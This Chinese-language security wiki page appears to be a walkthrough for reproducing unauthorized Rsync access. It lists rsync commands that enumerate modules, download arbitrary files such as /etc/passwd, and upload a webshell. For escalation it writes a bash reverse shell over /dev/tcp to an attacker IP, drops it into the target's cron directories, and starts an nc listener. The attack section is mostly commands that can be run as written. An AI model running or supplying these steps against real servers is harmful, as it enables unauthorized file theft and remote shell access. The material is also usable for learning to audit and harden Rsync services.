menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Rsync 未授权访问漏洞 chevron_right Rsync 未授权访问漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Rsync 未授权访问漏洞.md
    1.72 KB / 2021-07-15 20:02:36
        Rsync 未授权访问漏洞
    ====================
    
    一、漏洞简介
    ------------
    
    rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。
    
    **rsync的常用命令**
    
        列举整个同步目录或指定目录:
        rsync ip::
        rsync ip::xxx/
        下载文件或目录到本地:
        rsync -avz ip::xxx/xx.php /root
        rsync -avz ip::xxx/ /var/tmp
        上传文件到服务器:
        rsync -avz webshell.php ip::web/
    
    二、漏洞影响
    ------------
    
    三、复现过程
    ------------
    
    `nmap`先扫一波:![1.png](./resource/Rsync未授权访问漏洞/media/rId24.png)
    
        rsync rsync://www.0-sec.org:873/
        rsync rsync://www.0-sec.org:873/src 来查看模块名列表
        我们再列出src模块下的文件
        rsync rsync://www.0-sec.org:873/src/
    
    ![2.png](./resource/Rsync未授权访问漏洞/media/rId25.png)
    
        我们可以下载任意文件:
        rsync -av rsync://www.0-sec.org:873/src/etc/passwd ./
    
    ![3.png](./resource/Rsync未授权访问漏洞/media/rId26.png)
    
    **提权:**
    
    写入`shell`并赋权:
    
        #!/bin/bash 
        /bin/bash -i >& /dev/tcp/192.168.91.128/4444 0>&1
    
        chmod +x shell
    
    将`shell`上传至`/etc/cron.hourly`:
    
        rsync -av shell rsync://192.168.91.130/src/etc/cron.hourly
        rsync -av shell rsync://www.0-sec.org:873/src/etc/cron.d/shell
    
    ![4.png](./resource/Rsync未授权访问漏洞/media/rId27.png)
    
    本地监听:
    
        nc -nvv -lp 4444
    
    参考链接
    --------
    
    > https://fansonfan.github.io/2019/04/20/rsync-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/
    
    
    links
    file_download